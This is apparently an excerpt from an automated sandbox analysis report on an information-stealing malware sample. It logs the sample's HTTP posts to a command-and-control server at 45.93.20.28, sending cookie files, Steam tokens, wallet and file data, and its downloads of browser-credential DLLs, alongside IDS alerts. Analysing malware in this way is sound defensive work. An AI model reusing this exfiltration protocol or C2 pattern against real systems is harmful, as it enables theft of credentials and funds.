0d 0a | Data Ascii: ------DAKEBAKFHCFHIEBFBAFB | Content-Disposition: form-data; name="token" | 1900af6f9c89bc74a13e647bede3c3bcd380d7a0dbf38f6c9d44204f27d67b88ac247d7b | ------DAKEBAKFHCFHIEBFBAFB | Content-Disposition: form-data; name="message" | plugins | ------DAKEBAKFHCFHIEBFBAFB--
              Source: global traffic | HTTP traffic detected: POST /85a1cacf11314eb8.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----KEHJKJDGCGDAKFHIDBGC | Host: 45.93.20.28 | Content-Length: 268 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 2d 2d 2d 2d 4b 45 48 4a 4b 4a 44 47 43 47 44 41 4b 46 48 49 44 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 39 30 30 61 66 36 66 39 63 38 39 62 63 37 34 61 31 33 65 36 34 37 62 65 64 65 33 63 33 62 63 64 33 38 30 64 37 61 30 64 62 66 33 38 66 36 63 39 64 34 34 32 30 34 66 32 37 64 36 37 62 38 38 61 63 32 34 37 64 37 62 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 4a 4b 4a 44 47 43 47 44 41 4b 46 48 49 44 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 4a 4b 4a 44 47 43 47 44 41 4b 46 48 49 44 42 47 43 2d 2d 0d 0a | Data Ascii: ------KEHJKJDGCGDAKFHIDBGC | Content-Disposition: form-data; name="token" | 1900af6f9c89bc74a13e647bede3c3bcd380d7a0dbf38f6c9d44204f27d67b88ac247d7b | ------KEHJKJDGCGDAKFHIDBGC | Content-Disposition: form-data; name="message" | fplugins | ------KEHJKJDGCGDAKFHIDBGC--
              Source: global traffic | HTTP traffic detected: POST /85a1cacf11314eb8.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----HDAAAAFIIJDBGDGCGDAK | Host: 45.93.20.28 | Content-Length: 6019 | Connection: Keep-Alive | Cache-Control: no-cache
              Source: global traffic | HTTP traffic detected: GET /c66c0eade263c9a8/sqlite3.dll HTTP/1.1 | Host: 45.93.20.28 | Cache-Control: no-cache
              Source: global traffic | HTTP traffic detected: POST /85a1cacf11314eb8.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----IDGIJEGHDAECAKECAFCA | Host: 45.93.20.28 | Content-Length: 419 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 2d 2d 2d 2d 49 44 47 49 4a 45 47 48 44 41 45 43 41 4b 45 43 41 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 39 30 30 61 66 36 66 39 63 38 39 62 63 37 34 61 31 33 65 36 34 37 62 65 64 65 33 63 33 62 63 64 33 38 30 64 37 61 30 64 62 66 33 38 66 36 63 39 64 34 34 32 30 34 66 32 37 64 36 37 62 38 38 61 63 32 34 37 64 37 62 0d 0a 2d 2d 2d 2d 2d 2d 49 44 47 49 4a 45 47 48 44 41 45 43 41 4b 45 43 41 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 79 35 30 65 48 51 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 44 47 49 4a 45 47 48 44 41 45 43 41 4b 45 43 41 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 65 79 4a 70 5a 43 49 36 4d 53 77 69 63 6d 56 7a 64 57 78 30 49 6a 70 37 49 6d 4e 76 62 32 74 70 5a 58 4d 69 4f 6c 74 64 66 58 30 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 44 47 49 4a 45 47 48 44 41 45 43 41 4b 45 43 41 46 43 41 2d 2d 0d 0a | Data Ascii: ------IDGIJEGHDAECAKECAFCA | Content-Disposition: form-data; name="token" | 1900af6f9c89bc74a13e647bede3c3bcd380d7a0dbf38f6c9d44204f27d67b88ac247d7b | ------IDGIJEGHDAECAKECAFCA | Content-Disposition: form-data; name="file_name" | Y29va2llc1xHb29nbGUgQ2hyb21lXy50eHQ= | ------IDGIJEGHDAECAKECAFCA | Content-Disposition: form-data; name="file" | eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0= | ------IDGIJEGHDAECAKECAFCA--
              Source: global traffic | HTTP traffic detected: POST /85a1cacf11314eb8.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----IJKFCFHJDBKKFHIEHIDG | Host: 45.93.20.28 | Content-Length: 363 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 2d 2d 2d 2d 49 4a 4b 46 43 46 48 4a 44 42 4b 4b 46 48 49 45 48 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 39 30 30 61 66 36 66 39 63 38 39 62 63 37 34 61 31 33 65 36 34 37 62 65 64 65 33 63 33 62 63 64 33 38 30 64 37 61 30 64 62 66 33 38 66 36 63 39 64 34 34 32 30 34 66 32 37 64 36 37 62 38 38 61 63 32 34 37 64 37 62 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 46 43 46 48 4a 44 42 4b 4b 46 48 49 45 48 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 46 43 46 48 4a 44 42 4b 4b 46 48 49 45 48 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4b 46 43 46 48 4a 44 42 4b 4b 46 48 49 45 48 49 44 47 2d 2d 0d 0a | Data Ascii: ------IJKFCFHJDBKKFHIEHIDG | Content-Disposition: form-data; name="token" | 1900af6f9c89bc74a13e647bede3c3bcd380d7a0dbf38f6c9d44204f27d67b88ac247d7b | ------IJKFCFHJDBKKFHIEHIDG | Content-Disposition: form-data; name="file_name" | c21qbGxteW1sYnpxLnB3ZA== | ------IJKFCFHJDBKKFHIEHIDG | Content-Disposition: form-data; name="file" | ------IJKFCFHJDBKKFHIEHIDG--
              Source: global traffic | HTTP traffic detected: POST /85a1cacf11314eb8.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----BAEBGCFIEHCFIDGCAAFB | Host: 45.93.20.28 | Content-Length: 363 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 2d 2d 2d 2d 42 41 45 42 47 43 46 49 45 48 43 46 49 44 47 43 41 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 39 30 30 61 66 36 66 39 63 38 39 62 63 37 34 61 31 33 65 36 34 37 62 65 64 65 33 63 33 62 63 64 33 38 30 64 37 61 30 64 62 66 33 38 66 36 63 39 64 34 34 32 30 34 66 32 37 64 36 37 62 38 38 61 63 32 34 37 64 37 62 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 42 47 43 46 49 45 48 43 46 49 44 47 43 41 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 42 47 43 46 49 45 48 43 46 49 44 47 43 41 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 41 45 42 47 43 46 49 45 48 43 46 49 44 47 43 41 41 46 42 2d 2d 0d 0a | Data Ascii: ------BAEBGCFIEHCFIDGCAAFB | Content-Disposition: form-data; name="token" | 1900af6f9c89bc74a13e647bede3c3bcd380d7a0dbf38f6c9d44204f27d67b88ac247d7b | ------BAEBGCFIEHCFIDGCAAFB | Content-Disposition: form-data; name="file_name" | c21qbGxteW1sYnpxLnB3ZA== | ------BAEBGCFIEHCFIDGCAAFB | Content-Disposition: form-data; name="file" | ------BAEBGCFIEHCFIDGCAAFB--
              Source: global traffic | HTTP traffic detected: GET /c66c0eade263c9a8/freebl3.dll HTTP/1.1 | Host: 45.93.20.28 | Cache-Control: no-cache
              Source: global traffic | HTTP traffic detected: GET /c66c0eade263c9a8/mozglue.dll HTTP/1.1 | Host: 45.93.20.28 | Cache-Control: no-cache
              Source: global traffic | HTTP traffic detected: GET /c66c0eade263c9a8/msvcp140.dll HTTP/1.1 | Host: 45.93.20.28 | Cache-Control: no-cache
              Source: global traffic | HTTP traffic detected: GET /c66c0eade263c9a8/nss3.dll HTTP/1.1 | Host: 45.93.20.28 | Cache-Control: no-cache
              Source: global traffic | HTTP traffic detected: GET /c66c0eade263c9a8/softokn3.dll HTTP/1.1 | Host: 45.93.20.28 | Cache-Control: no-cache
              Source: global traffic | HTTP traffic detected: GET /c66c0eade263c9a8/vcruntime140.dll HTTP/1.1 | Host: 45.93.20.28 | Cache-Control: no-cache
              Source: global traffic | HTTP traffic detected: POST /85a1cacf11314eb8.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----JJKEBGHJKFIDGCAAFCAF | Host: 45.93.20.28 | Content-Length: 1067 | Connection: Keep-Alive | Cache-Control: no-cache
              Source: global traffic | HTTP traffic detected: POST /85a1cacf11314eb8.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----KKKJKEBKFCAAECAAAAAE | Host: 45.93.20.28 | Content-Length: 267 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4b 4a 4b 45 42 4b 46 43 41 41 45 43 41 41 41 41 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 39 30 30 61 66 36 66 39 63 38 39 62 63 37 34 61 31 33 65 36 34 37 62 65 64 65 33 63 33 62 63 64 33 38 30 64 37 61 30 64 62 66 33 38 66 36 63 39 64 34 34 32 30 34 66 32 37 64 36 37 62 38 38 61 63 32 34 37 64 37 62 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4b 4a 4b 45 42 4b 46 43 41 41 45 43 41 41 41 41 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4b 4a 4b 45 42 4b 46 43 41 41 45 43 41 41 41 41 41 45 2d 2d 0d 0a | Data Ascii: ------KKKJKEBKFCAAECAAAAAE | Content-Disposition: form-data; name="token" | 1900af6f9c89bc74a13e647bede3c3bcd380d7a0dbf38f6c9d44204f27d67b88ac247d7b | ------KKKJKEBKFCAAECAAAAAE | Content-Disposition: form-data; name="message" | wallets | ------KKKJKEBKFCAAECAAAAAE--
              Source: global traffic | HTTP traffic detected: POST /85a1cacf11314eb8.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----IIDHJDGCGDAAKEBGDBKF | Host: 45.93.20.28 | Content-Length: 265 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 2d 2d 2d 2d 49 49 44 48 4a 44 47 43 47 44 41 41 4b 45 42 47 44 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 39 30 30 61 66 36 66 39 63 38 39 62 63 37 34 61 31 33 65 36 34 37 62 65 64 65 33 63 33 62 63 64 33 38 30 64 37 61 30 64 62 66 33 38 66 36 63 39 64 34 34 32 30 34 66 32 37 64 36 37 62 38 38 61 63 32 34 37 64 37 62 0d 0a 2d 2d 2d 2d 2d 2d 49 49 44 48 4a 44 47 43 47 44 41 41 4b 45 42 47 44 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 49 49 44 48 4a 44 47 43 47 44 41 41 4b 45 42 47 44 42 4b 46 2d 2d 0d 0a | Data Ascii: ------IIDHJDGCGDAAKEBGDBKF | Content-Disposition: form-data; name="token" | 1900af6f9c89bc74a13e647bede3c3bcd380d7a0dbf38f6c9d44204f27d67b88ac247d7b | ------IIDHJDGCGDAAKEBGDBKF | Content-Disposition: form-data; name="message" | files | ------IIDHJDGCGDAAKEBGDBKF--
              Source: global traffic | HTTP traffic detected: POST /85a1cacf11314eb8.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----JJECGHJDBFIJJJKEHCBF | Host: 45.93.20.28 | Content-Length: 363 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 45 43 47 48 4a 44 42 46 49 4a 4a 4a 4b 45 48 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 39 30 30 61 66 36 66 39 63 38 39 62 63 37 34 61 31 33 65 36 34 37 62 65 64 65 33 63 33 62 63 64 33 38 30 64 37 61 30 64 62 66 33 38 66 36 63 39 64 34 34 32 30 34 66 32 37 64 36 37 62 38 38 61 63 32 34 37 64 37 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 43 47 48 4a 44 42 46 49 4a 4a 4a 4b 45 48 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 43 47 48 4a 44 42 46 49 4a 4a 4a 4b 45 48 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 43 47 48 4a 44 42 46 49 4a 4a 4a 4b 45 48 43 42 46 2d 2d 0d 0a | Data Ascii: ------JJECGHJDBFIJJJKEHCBF | Content-Disposition: form-data; name="token" | 1900af6f9c89bc74a13e647bede3c3bcd380d7a0dbf38f6c9d44204f27d67b88ac247d7b | ------JJECGHJDBFIJJJKEHCBF | Content-Disposition: form-data; name="file_name" | c3RlYW1fdG9rZW5zLnR4dA== | ------JJECGHJDBFIJJJKEHCBF | Content-Disposition: form-data; name="file" | ------JJECGHJDBFIJJJKEHCBF--
              Source: global traffic | HTTP traffic detected: POST /85a1cacf11314eb8.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----EGCBFIEHIEGCAAAKKKKE | Host: 45.93.20.28 | Content-Length: 272 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 39 30 30 61 66 36 66 39 63 38 39 62 63 37 34 61 31 33 65 36 34 37 62 65 64 65 33 63 33 62 63 64 33 38 30 64 37 61 30 64 62 66 33 38 66 36 63 39 64 34 34 32 30 34 66 32 37 64 36 37 62 38 38 61 63 32 34 37 64 37 62 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 2d 2d 0d 0a | Data Ascii: ------EGCBFIEHIEGCAAAKKKKE | Content-Disposition: form-data; name="token" | 1900af6f9c89bc74a13e647bede3c3bcd380d7a0dbf38f6c9d44204f27d67b88ac247d7b | ------EGCBFIEHIEGCAAAKKKKE | Content-Disposition: form-data; name="message" | ybncbhylepme | ------EGCBFIEHIEGCAAAKKKKE--
              Source: global traffic | HTTP traffic detected: POST /85a1cacf11314eb8.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----CFHDHIJDGCBAKFIEGHCB | Host: 45.93.20.28 | Content-Length: 272 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 2d 2d 2d 2d 43 46 48 44 48 49 4a 44 47 43 42 41 4b 46 49 45 47 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 39 30 30 61 66 36 66 39 63 38 39 62 63 37 34 61 31 33 65 36 34 37 62 65 64 65 33 63 33 62 63 64 33 38 30 64 37 61 30 64 62 66 33 38 66 36 63 39 64 34 34 32 30 34 66 32 37 64 36 37 62 38 38 61 63 32 34 37 64 37 62 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 48 49 4a 44 47 43 42 41 4b 46 49 45 47 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 48 49 4a 44 47 43 42 41 4b 46 49 45 47 48 43 42 2d 2d 0d 0a | Data Ascii: ------CFHDHIJDGCBAKFIEGHCB | Content-Disposition: form-data; name="token" | 1900af6f9c89bc74a13e647bede3c3bcd380d7a0dbf38f6c9d44204f27d67b88ac247d7b | ------CFHDHIJDGCBAKFIEGHCB | Content-Disposition: form-data; name="message" | wkkjqaiaxkhb | ------CFHDHIJDGCBAKFIEGHCB--
              Source: Joe Sandbox View | ASN Name: COGENT-174US COGENT-174US
              Source: Joe Sandbox View | JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
              Source: Network traffic | Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49717 -> 45.93.20.28:80
              Source: Network traffic | Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49743 -> 45.93.20.28:80
              Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknown | TCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknown | TCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknown | TCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknown | TCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknown | TCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknown | TCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknown | TCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknown | TCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknown | TCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknown | TCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknown | TCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknown | TCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknown | TCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknown | TCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknown | TCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknown | TCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknown | TCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknown | TCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknown | TCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknown | TCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknown | TCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknown | TCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknown | TCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknown | TCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknown | TCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknown | TCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknown | TCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknown | TCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknown | TCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknown | TCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknown | TCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknown | TCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknown | TCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknown | TCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknown | TCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknown | TCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknown | TCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknown | TCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknown | TCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknown | TCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknown | TCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknown | TCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknown | TCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknown | TCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: unknown | TCP traffic detected without corresponding DNS query: 45.93.20.28
              Source: global traffic | HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1 | Host: www.google.com | Connection: keep-alive | X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEI0qDKAQig4coBCJOhywEInP7MAQiFoM0BCMjRzgEIvtXOAQiA1s4BCMjczgEIiuDOAQiu5M4BCIvlzgE= | Sec-Fetch-Site: none | Sec-Fetch-Mode: no-cors | Sec-Fetch-Dest: empty | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 | Accept-Encoding: gzip, deflate, br, zstd | Accept-Language: en-US,en;q=0.9
              Source: global traffic | HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1 | Host: www.google.com | Connection: keep-alive | Sec-Fetch-Site: none | Sec-Fetch-Mode: no-cors | Sec-Fetch-Dest: empty | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 | Accept-Encoding: gzip, deflate, br, zstd | Accept-Language: en-US,en;q=0.9
              Source: global traffic | HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 | Host: www.google.com | Connection: keep-alive | X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEI0qDKAQig4coBCJOhywEInP7MAQiFoM0BCMjRzgEIvtXOAQiA1s4BCMjczgEIiuDOAQiu5M4BCIvlzgE= | Sec-Fetch-Site: cross-site | Sec-Fetch-Mode: no-cors | Sec-Fetch-Dest: empty | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 | Accept-Encoding: gzip, deflate, br, zstd | Accept-Language: en-US,en;q=0.9
              Source: global traffic | HTTP traffic detected: GET /async/newtab_promos HTTP/1.1 | Host: www.google.com | Connection: keep-alive | Sec-Fetch-Site: cross-site | Sec-Fetch-Mode: no-cors | Sec-Fetch-Dest: empty | Sec-Fetch-Storage-Access: active | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 | Accept-Encoding: gzip, deflate, br, zstd | Accept-Language: en-US,en;q=0.9
              Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: 45.93.20.28 | Connection: Keep-Alive | Cache-Control: no-cache
              Source: global traffic | HTTP traffic detected: GET /c66c0eade263c9a8/sqlite3.dll HTTP/1.1 | Host: 45.93.20.28 | Cache-Control: no-cache
              Source: global traffic | HTTP traffic detected: GET /c66c0eade263c9a8/freebl3.dll HTTP/1.1 | Host: 45.93.20.28 | Cache-Control: no-cache
              Source: global traffic | HTTP traffic detected: GET /c66c0eade263c9a8/mozglue.dll HTTP/1.1 | Host: 45.93.20.28 | Cache-Control: no-cache
              Source: global traffic | HTTP traffic detected: GET /c66c0eade263c9a8/msvcp140.dll HTTP/1.1 | Host: 45.93.20.28 | Cache-Control: no-cache
              Source: global traffic | HTTP traffic detected: GET /c66c0eade263c9a8/nss3.dll HTTP/1.1 | Host: 45.93.20.28 | Cache-Control: no-cache
              Source: global traffic | HTTP traffic detected: GET /c66c0eade263c9a8/softokn3.dll HTTP/1.1 | Host: 45.93.20.28 | Cache-Control: no-cache
              Source: global traffic | HTTP traffic detected: GET /c66c0eade263c9a8/vcruntime140.dll HTTP/1.1 | Host: 45.93.20.28 | Cache-Control: no-cache
              Source: global trafficDNS traffic detected: DNS query: www.google.com
